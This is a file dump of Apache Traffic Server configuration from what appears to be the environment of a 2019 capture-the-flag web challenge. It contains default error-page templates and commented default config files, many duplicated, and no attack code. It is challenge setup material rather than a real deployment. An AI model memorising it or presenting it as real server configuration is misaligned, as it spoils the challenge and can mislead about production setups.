 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>No Content Length</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Could not process this request because
12 | there was no Content-Length specified.
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/request#no_host:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Host Header Required</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Host Header Required</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Your browser did not send a "Host" HTTP header field
12 | and therefore the virtual host being requested could not be determined.
13 | To access this web site correctly, you will need to upgrade to a browser
14 | that supports the HTTP "Host" header field.
15 | </B></FONT>
16 | <HR>
17 | </BODY>
18 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/request#scheme_unsupported:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Unsupported Protocol</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Unsupported Protocol</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Can't perform your request for the document because
12 | the protocol scheme is unknown.
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/request#syntax_error:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Bad Request</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Bad Request</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Could not process this request. 
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/response#bad_response:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Web Server Error</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Web Server Error</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: The host requested  did not return the document correctly.
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/response#bad_version:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>HTTP Version Not Supported</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>HTTP Version Not Supported</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: The web server requested is using an unsupported
12 | version of the HTTP protocol.
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/timeout#activity:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Activity Timeout</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Activity Timeout</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Too much time has passed transmitting document. 
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/timeout#inactivity:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Inactivity Timeout</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Inactivity Timeout</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Too much time has passed without sending any data for document. 
12 | </B></FONT>
13 | <HR>
14 | </BODY>
15 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/transcoding#unsupported:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Transcoding Not Available</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Transcoding Not Available</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial">
11 | 
12 | <B> Description: Unable to provide the document in the
13 | format requested by your browser.
14 | </B></FONT>
15 | <HR>
16 | </BODY>
17 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/body_factory/default/urlrouting#no_mapping:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <HEAD>
 3 | <TITLE>Not Found on Accelerator</TITLE>
 4 | </HEAD>
 5 | 
 6 | <BODY BGCOLOR="white" FGCOLOR="black">
 7 | <H1>Not Found on Accelerator</H1>
 8 | <HR>
 9 | 
10 | <FONT FACE="Helvetica,Arial"><B>
11 | Description: Your request on the specified host was not found.
12 | Check the location and try again.
13 | </B></FONT>
14 | <HR>
15 | </BODY>
16 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/cache.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # cache.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/cache.config.en.html
 6 | #
 7 | # The purpose of this file is to alter caching parameters of
 8 | #   specific objects or sets of objects
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>
12 | #
13 | # Each line must include exactly one primary specifier
14 | #
15 | #   Primary destination specifiers are
16 | #     dest_domain=
17 | #     dest_host=
18 | #     dest_ip=
19 | #     url_regex=
20 | #
21 | #
22 | # Lines may include any number of the secondary specifiers but
23 | #    secondary specifiers may not be duplicated on the same line
24 | #
25 | #   Secondary specifiers are
26 | #     port=
27 | #     scheme=
28 | #     prefix=
29 | #     suffix=
30 | #     method=
31 | #     time=
32 | #     src_ip=
33 | #     internal={true,false}
34 | #
35 | # Each line must include exactly one cache directive
36 | #   Cache directives are
37 | #     action=never-cache
38 | #     action=ignore-no-cache          (client & server no cache)
39 | #     action=ignore-client-no-cache   (only client no cache)
40 | #     action=ignore-server-no-cache   (only server no cache)
41 | #     pin-in-cache=<time>
42 | #     revalidate=<time>
43 | #     ttl-in-cache=<time>             (force caching and expire after <time>)
44 | #
45 | # Each line may also contain various "tweaks" which adjust caching parameters.
46 | #   Tweaks are
47 | #     cache-responses-to-cookies=<value>
48 | #       - Change the style of caching with regard to cookies. This effectively
49 | #         overrides the configuration parameter
50 | #           proxy.config.http.cache.cache_responses_to_cookies
51 | #         and uses the same values with the same semantics. The override happens
52 | #         only for requests that match.
53 | #
54 | # Examples
55 | #
56 | #  Revalidate all http objects from www.example.com after 2 hours 
57 | #    dest_domain=www.example.com   scheme=http  revalidate=2h
58 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/cache.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # cache.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/cache.config.en.html
 6 | #
 7 | # The purpose of this file is to alter caching parameters of
 8 | #   specific objects or sets of objects
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>
12 | #
13 | # Each line must include exactly one primary specifier
14 | #
15 | #   Primary destination specifiers are
16 | #     dest_domain=
17 | #     dest_host=
18 | #     dest_ip=
19 | #     url_regex=
20 | #
21 | #
22 | # Lines may include any number of the secondary specifiers but
23 | #    secondary specifiers may not be duplicated on the same line
24 | #
25 | #   Secondary specifiers are
26 | #     port=
27 | #     scheme=
28 | #     prefix=
29 | #     suffix=
30 | #     method=
31 | #     time=
32 | #     src_ip=
33 | #     internal={true,false}
34 | #
35 | # Each line must include exactly one cache directive
36 | #   Cache directives are
37 | #     action=never-cache
38 | #     action=ignore-no-cache          (client & server no cache)
39 | #     action=ignore-client-no-cache   (only client no cache)
40 | #     action=ignore-server-no-cache   (only server no cache)
41 | #     pin-in-cache=<time>
42 | #     revalidate=<time>
43 | #     ttl-in-cache=<time>             (force caching and expire after <time>)
44 | #
45 | # Each line may also contain various "tweaks" which adjust caching parameters.
46 | #   Tweaks are
47 | #     cache-responses-to-cookies=<value>
48 | #       - Change the style of caching with regard to cookies. This effectively
49 | #         overrides the configuration parameter
50 | #           proxy.config.http.cache.cache_responses_to_cookies
51 | #         and uses the same values with the same semantics. The override happens
52 | #         only for requests that match.
53 | #
54 | # Examples
55 | #
56 | #  Revalidate all http objects from www.example.com after 2 hours 
57 | #    dest_domain=www.example.com   scheme=http  revalidate=2h
58 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/cluster.config:
--------------------------------------------------------------------------------
 1 | # Cluster Configuration file
 2 | #
 3 | # This file is machine generated and machine parsed.
 4 | # Please do not change this file by hand.
 5 | #
 6 | # This file designates the machines which make up the cluster
 7 | # proper.  Data and load are distributed among these machines.
 8 | #
 9 | ############################################################################
10 | # Number
11 | # IP:Port 
12 | # ...
13 | ############################################################################
14 | # Number = { 0, 1 ... } where 0 is a stand-alone proxy
15 | # IP:Port = IP address: cluster accept port number
16 | #
17 | # Example 1: stand-alone proxy
18 | # 0
19 | #
20 | # Example 2: 3 machines
21 | # 3
22 | # 127.1.2.3:83
23 | # 127.1.2.4:83
24 | # 127.1.2.5:83
25 | #
26 | 0
27 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/cluster.config_1:
--------------------------------------------------------------------------------
 1 | # Cluster Configuration file
 2 | #
 3 | # This file is machine generated and machine parsed.
 4 | # Please do not change this file by hand.
 5 | #
 6 | # This file designates the machines which make up the cluster
 7 | # proper.  Data and load are distributed among these machines.
 8 | #
 9 | ############################################################################
10 | # Number
11 | # IP:Port 
12 | # ...
13 | ############################################################################
14 | # Number = { 0, 1 ... } where 0 is a stand-alone proxy
15 | # IP:Port = IP address: cluster accept port number
16 | #
17 | # Example 1: stand-alone proxy
18 | # 0
19 | #
20 | # Example 2: 3 machines
21 | # 3
22 | # 127.1.2.3:83
23 | # 127.1.2.4:83
24 | # 127.1.2.5:83
25 | #
26 | 0
27 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/congestion.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # congestion.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/congestion.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the congestion control rules.
 8 | #
 9 | # Each line consists of a set of tag value pairs.  The pairs
10 | #   are in the format  <tag>=<value>
11 | #
12 | # Each line must include exactly one primary specifier
13 | #
14 | #   Primary destination specifiers are
15 | #     dest_domain=
16 | #     dest_host=
17 | #     dest_ip=
18 | #     host_regex=
19 | #
20 | # Lines may include any number of the secondary specifiers but
21 | #   secondary specifiers may not be duplicated on the same line.
22 | #
23 | #   Secondary specifiers are
24 | #     port=
25 | #     prefix=
26 | #
27 | #   The CongestionControl Rule tag=<tag_value> pairs include:
28 | #        max_connection_failures=<integer>       //  M
29 | #        fail_window=<interger>                  //  N
30 | #        proxy_retry_interval=<integer>          //  t
31 | #        client_wait_interval=<integer>          //  T
32 | #        wait_interval_alpha=<integer>           // alpha
33 | #        live_os_conn_timeout=<integer>          //  n
34 | #        live_os_conn_retries=<integer>          //  m
35 | #        dead_os_conn_timeout=<integer>          //  n'
36 | #        dead_os_conn_retries=<interger>         //  m'
37 | #        max_connection=<integer>                // -1 means unlimited
38 | #        error_page=<page uri>
39 | #        congestion_scheme=per_ip|per_host
40 | #
41 | #
42 | # The suggested default values are as follows:
43 | #        max_connection_failures=5
44 | #        fail_window=120
45 | #        proxy_retry_interval=10
46 | #        client_wait_interval=300
47 | #        wait_interval_alpha=30
48 | #        live_os_conn_timeout=60
49 | #        live_os_conn_retries=2
50 | #        dead_os_conn_timeout=15
51 | #        dead_os_conn_retries=1
52 | #        max_connection=-1
53 | #        error_page="congestion#retryAfter"
54 | #        congestion_scheme="per_ip"
55 | #
56 | # You can change the records.config config variables to change the above defaults:
57 | # CONFIG proxy.config.http.congestion_control.default.XXX INT|STRING YYY
58 | #
59 | 
60 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/congestion.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # congestion.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/congestion.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the congestion control rules.
 8 | #
 9 | # Each line consists of a set of tag value pairs.  The pairs
10 | #   are in the format  <tag>=<value>
11 | #
12 | # Each line must include exactly one primary specifier
13 | #
14 | #   Primary destination specifiers are
15 | #     dest_domain=
16 | #     dest_host=
17 | #     dest_ip=
18 | #     host_regex=
19 | #
20 | # Lines may include any number of the secondary specifiers but
21 | #   secondary specifiers may not be duplicated on the same line.
22 | #
23 | #   Secondary specifiers are
24 | #     port=
25 | #     prefix=
26 | #
27 | #   The CongestionControl Rule tag=<tag_value> pairs include:
28 | #        max_connection_failures=<integer>       //  M
29 | #        fail_window=<interger>                  //  N
30 | #        proxy_retry_interval=<integer>          //  t
31 | #        client_wait_interval=<integer>          //  T
32 | #        wait_interval_alpha=<integer>           // alpha
33 | #        live_os_conn_timeout=<integer>          //  n
34 | #        live_os_conn_retries=<integer>          //  m
35 | #        dead_os_conn_timeout=<integer>          //  n'
36 | #        dead_os_conn_retries=<interger>         //  m'
37 | #        max_connection=<integer>                // -1 means unlimited
38 | #        error_page=<page uri>
39 | #        congestion_scheme=per_ip|per_host
40 | #
41 | #
42 | # The suggested default values are as follows:
43 | #        max_connection_failures=5
44 | #        fail_window=120
45 | #        proxy_retry_interval=10
46 | #        client_wait_interval=300
47 | #        wait_interval_alpha=30
48 | #        live_os_conn_timeout=60
49 | #        live_os_conn_retries=2
50 | #        dead_os_conn_timeout=15
51 | #        dead_os_conn_retries=1
52 | #        max_connection=-1
53 | #        error_page="congestion#retryAfter"
54 | #        congestion_scheme="per_ip"
55 | #
56 | # You can change the records.config config variables to change the above defaults:
57 | # CONFIG proxy.config.http.congestion_control.default.XXX INT|STRING YYY
58 | #
59 | 
60 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/hosting.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # hosting.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/hosting.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the volumes that 
 8 | # specific hostnames or domains should be stored in.
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>
12 | #
13 | # Each line must include exactly one primary specifier
14 | #
15 | #   Primiary destination specifiers are
16 | #     domain=
17 | #     hostname=
18 | #
19 | #
20 | # Available directives are:
21 | # volume=  (comma separated list of volumes)
22 | #  
23 | # All requests that 
24 | # don't belong to the list of hostnames in this file go to the 
25 | # volumes specified with the hostname or domain name = '*'
26 | # 
27 | # For example: to store all inktomi objects in volume 2 
28 | # hostname=www.example.com  volume=2
29 | # To direct all other requests to volumes 3 and 4
30 | # hostname=*	volume=3,4
31 | #  
32 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/hosting.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # hosting.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/hosting.config.en.html
 6 | #
 7 | # The purpose of this file is to specify the volumes that 
 8 | # specific hostnames or domains should be stored in.
 9 | #
10 | # Each line consists of a set of tag value pairs.  The pairs
11 | #   are in the format  <tag>=<value>
12 | #
13 | # Each line must include exactly one primary specifier
14 | #
15 | #   Primiary destination specifiers are
16 | #     domain=
17 | #     hostname=
18 | #
19 | #
20 | # Available directives are:
21 | # volume=  (comma separated list of volumes)
22 | #  
23 | # All requests that 
24 | # don't belong to the list of hostnames in this file go to the 
25 | # volumes specified with the hostname or domain name = '*'
26 | # 
27 | # For example: to store all inktomi objects in volume 2 
28 | # hostname=www.example.com  volume=2
29 | # To direct all other requests to volumes 3 and 4
30 | # hostname=*	volume=3,4
31 | #  
32 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/icp.config:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/D^3CTF2019_Showhub/ats-etc/trafficserver/icp.config


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/ip_allow.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # ip_allow.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/ip_allow.config.en.html
 6 | #
 7 | # Rules:
 8 | # src_ip=<range of IP addresses> action=<action> [method=<list of methods separated by '|'>]
 9 | #
10 | # Actions: ip_allow, ip_deny
11 | #
12 | # Multiple method keywords can be specified (method=GET method=HEAD), or
13 | # multiple methods can be separated by an '|' (method=GET|HEAD).  The method
14 | # keyword is optional and it is defaulted to ALL.
15 | # Available methods: ALL, GET, CONNECT, DELETE, HEAD, ICP_QUERY, OPTIONS,
16 | # POST, PURGE, PUT, TRACE, PUSH
17 | #
18 | # Rules are applied in the order listed starting from the top.
19 | # That means you generally want to append your rules after the ones listed here.
20 | #
21 | # Allow anything on localhost (this is the default configuration based on the
22 | # depricated CONFIG proxy.config.http.quick_filter.mask INT 0x482)
23 | src_ip=127.0.0.1                                  action=ip_allow method=ALL
24 | src_ip=::1                                        action=ip_allow method=ALL
25 | # Deny PURGE, DELETE, and PUSH for all (this implies allow other methods for all)
26 | src_ip=0.0.0.0-255.255.255.255                    action=ip_deny  method=PUSH|PURGE|DELETE
27 | src_ip=::-ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff action=ip_deny  method=PUSH|PURGE|DELETE
28 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/ip_allow.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # ip_allow.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/ip_allow.config.en.html
 6 | #
 7 | # Rules:
 8 | # src_ip=<range of IP addresses> action=<action> [method=<list of methods separated by '|'>]
 9 | #
10 | # Actions: ip_allow, ip_deny
11 | #
12 | # Multiple method keywords can be specified (method=GET method=HEAD), or
13 | # multiple methods can be separated by an '|' (method=GET|HEAD).  The method
14 | # keyword is optional and it is defaulted to ALL.
15 | # Available methods: ALL, GET, CONNECT, DELETE, HEAD, ICP_QUERY, OPTIONS,
16 | # POST, PURGE, PUT, TRACE, PUSH
17 | #
18 | # Rules are applied in the order listed starting from the top.
19 | # That means you generally want to append your rules after the ones listed here.
20 | #
21 | # Allow anything on localhost (this is the default configuration based on the
22 | # depricated CONFIG proxy.config.http.quick_filter.mask INT 0x482)
23 | src_ip=127.0.0.1                                  action=ip_allow method=ALL
24 | src_ip=::1                                        action=ip_allow method=ALL
25 | # Deny PURGE, DELETE, and PUSH for all (this implies allow other methods for all)
26 | src_ip=0.0.0.0-255.255.255.255                    action=ip_deny  method=PUSH|PURGE|DELETE
27 | src_ip=::-ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff action=ip_deny  method=PUSH|PURGE|DELETE
28 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/log_hosts.config:
--------------------------------------------------------------------------------
 1 | #
 2 | # log_hosts.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/log_hosts.config.en.html
 6 | #
 7 | # This configuration file is used when the Traffic Server is configured in
 8 | # reverse-proxy mode and access logs are to be separated by server host
 9 | # name.  This file lists the host names that are to generate separate
10 | # access log files.
11 | #
12 | # The format of this file is to have one host name per line.
13 | #
14 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/log_hosts.config_1:
--------------------------------------------------------------------------------
 1 | #
 2 | # log_hosts.config
 3 | #
 4 | # Documentation:
 5 | #    https://docs.trafficserver.apache.org/en/latest/admin-guide/files/log_hosts.config.en.html
 6 | #
 7 | # This configuration file is used when the Traffic Server is configured in
 8 | # reverse-proxy mode and access logs are to be separated by server host
 9 | # name.  This file lists the host names that are to generate separate
10 | # access log files.
11 | #
12 | # The format of this file is to have one host name per line.
13 | #
14 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/logging.config:
--------------------------------------------------------------------------------
  1 | -- Custom log configuration.
  2 | 
  3 | -- Predefined Functions.
  4 | --
  5 | -- format(table)
  6 | --  Returns a format object. The given table supports the following fields:
  7 | --    Format (string, required):    log format string
  8 | --    Interval (number, optional):  log aggregation interval
  9 | --
 10 | -- filter.accept(string)
 11 | --  Create a filter object that accepts logs matching the filter string.
 12 | --
 13 | -- filter.reject(string)
 14 | --  Create a filter object that drops logs matching the filter string.
 15 | --
 16 | -- filter.wipe(string)
 17 | --  Create a filter object that wipes (read: removes) the log fields specified in the filter string.
 18 | --
 19 | -- log.ascii(table)
 20 | --  Creates an ASCII logging object.
 21 | --
 22 | -- log.binary(table)
 23 | --  Creates a binary logging object.
 24 | --
 25 | -- log.pipe(table)
 26 | --  Creates a logging object that logs to a pipe.
 27 | --
 28 | -- The log.* functions accept a table that supports the following fields:
 29 | --    Filename (string, required):
 30 | --    Format (string or format object, required):
 31 | --    Header (string, optional):
 32 | --    RollingEnabled (boolean, optional):
 33 | --    RollingIntervalSec (number, optional):
 34 | --    RollingOffsetHr (number, optional):
 35 | --    RollingSizeMb (number, optional):
 36 | --    Filters (array of filter objects, optional):
 37 | --    CollationHosts (array of strings, optional):
 38 | --      This parameter may be either a single string or an array of entries.
 39 | --      Entries may be strings or arrays of strings. A string specifies a
 40 | --      single collation host, which is equivalent to providing an array
 41 | --      containing a single string.
 42 | --
 43 | --      If multiple entries are given, multiple collation hosts are configured
 44 | --      and each log entry will be forwarded to every host.
 45 | --
 46 | --      If an entry is an array of strings, this defines a collation host
 47 | --      failover group. The first array entry is the primary collation host
 48 | --      and the remaining entries are attached as ordered failover hosts
 49 | --      that will be attempted if the primary host fails.
 50 | --
 51 | --      A single collation host with failover:
 52 | --        { {'logs-1.example.com:4567', 'logs-2.example.com:4567'} }
 53 | --
 54 | --      Multiple collation hosts:
 55 | --        {'logs-1.example.com:4567', 'logs-2.example.com:4567'}
 56 | --
 57 | --      Multiple collation hosts with some failover:
 58 | --        {'logs-1.example.com:4567', { 'logs-2.example.com:4567', 'logs-2a.example.com:4567'} }
 59 | 
 60 | -- Predefined variables.
 61 | --
 62 | -- log.roll.none (number)
 63 | --  RollingEnabled value to disable all log rolling.
 64 | --
 65 | -- log.roll.time (number)
 66 | --  RollingEnabled value. Roll at a certain time requency, specified
 67 | --  by RollingIntervalSec, and RollingOffsetHr.
 68 | --
 69 | -- log.roll.size (number)
 70 | --  RollingEnabled value. Roll when the size exceeds RollingSizeMb.
 71 | --
 72 | -- log.roll.both (number)
 73 | --  RollingEnabled value. Roll when either the specified rolling
 74 | --  time is reached or the specified file size is reached.
 75 | --
 76 | -- log.roll.any (number)
 77 | --  RollingEnabled value. Roll the log file when the specified
 78 | --  rolling time is reached if the size of the file equals or exceeds
 79 | --  the specified size.
 80 | --
 81 | -- log.protocol.http (number)
 82 | -- log.protocol.icp (number)
 83 | --  Server protocol constants for constructing %<etype> filters.
 84 | 
 85 | -- Removed parameters.
 86 | --
 87 | -- The following logging object parameters that were supported in
 88 | -- the XML configuration file have been removed.
 89 | --
 90 | -- Protocols:
 91 | --      The list of protocols to log is a comma separated list of the
 92 | --      protocols that the object logs.  If the log object has no
 93 | --      Protocol tag, then it logs all protocols. The Protocol tag
 94 | --      simply provides an easy way to create a filter that accepts
 95 | --      the specified protocols.
 96 | --
 97 | --      The log object Protocols parameter is no longer supported. This
 98 | --      parameter can be implemented with a filter on the %<etype> (log
 99 | --      entry type) log field, eg.
100 | --
101 | --      all = filter.accept(string.format('%%<etype> CONTAIN %d,%d', log.protocol.http, log.protocol.icp))
102 | --      icp_only = filter.accept(string.format('%%<etype> CONTAIN %d', log.protocol.icp))
103 | --      http_only = filter.accept(string.format('%%<etype> CONTAIN %d', log.protocol.http))
104 | --
105 | -- ServerHosts:
106 | --      This parameter provides an easy way to create a filter that logs
107 | --      only the requests to hosts in the comma separated list. Only entries
108 | --      from the named servers will be included in the log file. Servers
109 | --      can only be specified by name, not by IP address.
110 | --
111 | --      The log object ServerHosts parameter is no longer supported. It can
112 | --      implemented with a filter on the %<shn> (server host name) log
113 | --      field, eg.
114 | --
115 | --      hosts = filter.accept('%<shn> CASE_INSENSITIVE_CONTAIN host1,host2,host3,etc")
116 | 
117 | -- WebTrends Enhanced Log Format.
118 | --
119 | -- The following is compatible with the WebTrends Enhanced Log Format.
120 | -- If you want to generate a log that can be parsed by WebTrends
121 | -- reporting tools, simply create a log that uses this format.
122 | welf = format {
123 |   Format = 'id=firewall time="%<cqtd> %<cqtt>" fw=%<phn> pri=6 proto=%<cqus> duration=%<ttmsf> sent=%<psql> rcvd=%<cqhl> src=%<chi> dst=%<shi> dstname=%<shn> user=%<caun> op=%<cqhm> arg="%<cqup>" result=%<pssc> ref="%<{Referer}cqh>" agent="%<{user-agent}cqh>" cache=%<crc>'
124 | }
125 | 
126 | -- Squid Log Format with seconds resolution timestamp.
127 | --
128 | -- The following is the squid format but with a seconds-only timestamp
129 | -- (cqts) instead of a seconds and milliseconds timestamp (cqtq).
130 | squid_seconds_only_timestamp = format {
131 |   Format = '%<cqts> %<ttms> %<chi> %<crc>/%<pssc> %<psql> %<cqhm> %<cquc> %<caun> %<phr>/%<pqsn> %<psct>'
132 | }
133 | 
134 | -- Squid Log Format.
135 | squid = format {
136 |   Format = '%<cqtq> %<ttms> %<chi> %<crc>/%<pssc> %<psql> %<cqhm> %<cquc> %<caun> %<phr>/%<pqsn> %<psct>'
137 | }
138 | 
139 | -- Common Log Format.
140 | common = format {
141 |   Format = '%<chi> - %<caun> [%<cqtn>] "%<cqtx>" %<pssc> %<pscl>'
142 | }
143 | 
144 | -- Extended Log Format.
145 | extended = format {
146 |   Format = '%<chi> - %<caun> [%<cqtn>] "%<cqtx>" %<pssc> %<pscl> %<sssc> %<sscl> %<cqcl> %<pqcl> %<cqhl> %<pshl> %<pqhl> %<sshl> %<tts>'
147 | }
148 | 
149 | -- Extended2 Log Formats
150 | extended2 = format {
151 |   Format = '%<chi> - %<caun> [%<cqtn>] "%<cqtx>" %<pssc> %<pscl> %<sssc> %<sscl> %<cqcl> %<pqcl> %<cqhl> %<pshl> %<pqhl> %<sshl> %<tts> %<phr> %<cfsc> %<pfsc> %<crc>'
152 | }
153 | 
154 | log.binary {
155 |     Format = squid,
156 |     Filename = 'squid'
157 | }
158 | 
159 | -- vim: set ft=lua :
160 | 


--------------------------------------------------------------------------------
/D^3CTF2019_Showhub/ats-etc/trafficserver/logging.config_1:
--------------------------------------------------------------------------------
  1 | -- Custom log configuration.
  2 | 
  3 | -- Predefined Functions.
  4 | --
  5 | -- format(table)
  6 | --  Returns a format object. The given table supports the following fields:
  7 | --    Format (string, required):    log format string
  8 | --    Interval (number, optional):  log aggregation interval
  9 | --
 10 | -- filter.accept(string)
 11 | --  Create a filter object that accepts logs matching the filter string.
 12 | --
 13 | -- filter.reject(string)
 14 | --  Create a filter object that drops logs matching the filter string.
 15 | --
 16 | -- filter.wipe(string)
 17 | --  Create a filter object that wipes (read: removes) the log fields specified in the filter string.
 18 | --
 19 | -- log.ascii(table)
 20 | --  Creates an ASCII logging object.
 21 | --
 22 | -- log.binary(table)
 23 | --  Creates a binary logging object.
 24 | --
 25 | -- log.pipe(table)
 26 | --  Creates a logging object that logs to a pipe.
 27 | --
 28 | -- The log.* functions accept a table that supports the following fields:
 29 | --    Filename (string, required):
 30 | --    Format (string or format object, required):
 31 | --    Header (string, optional):
 32 | --    RollingEnabled (boolean, optional):
 33 | --    RollingIntervalSec (number, optional):
 34 | --    RollingOffsetHr (number, optional):
 35 | --    RollingSizeMb (number, optional):
 36 | --    Filters (array of filter objects, optional):
 37 | --    CollationHosts (array of strings, optional):
 38 | --      This parameter may be either a single string or an array of entries.
 39 | --      Entries may be strings or arrays of strings. A string specifies a
 40 | --      single collation host, which is equivalent to providing an array
 41 | --      containing a single string.
 42 | --
 43 | --      If multiple entries are given, multiple collation hosts are configured
 44 | --      and each log entry will be forwarded to every host.
 45 | --
 46 | --      If an entry is an array of strings, this defines a collation host
 47 | --      failover group. The first array entry is the primary collation host
 48 | --      and the remaining entries are attached as ordered failover hosts
 49 | --      that will be attempted if the primary host fails.
 50 | --
 51 | --      A single collation host with failover:
 52 | --        { {'logs-1.example.com:4567', 'logs-2.example.com:4567'} }
 53 | --
 54 | --      Multiple collation hosts:
 55 | --        {'logs-1.example.com:4567', 'logs-2.example.com:4567'}
 56 | --
